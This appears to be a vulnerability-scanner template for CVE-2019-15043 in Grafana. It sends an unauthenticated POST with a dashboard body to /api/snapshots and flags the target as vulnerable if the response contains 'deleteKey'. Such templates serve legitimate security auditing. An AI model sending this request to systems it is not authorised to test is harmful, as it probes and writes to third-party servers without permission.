id: CVE-2019-15043
info:
  author: bing0o
  name: Grafana unauthenticated API
  severity: medium
requests:
  - body: >-
      {"dashboard":
      {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
      [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
      3600}
    headers:
      Content-Type: application/json
      Host: '{{Hostname}}'
      User-Agent: Mozilla/5.0
    matchers:
      - part: body
        type: word
        words:
          - deleteKey
    method: POST
    path:
      - '{{BaseURL}}/api/snapshots'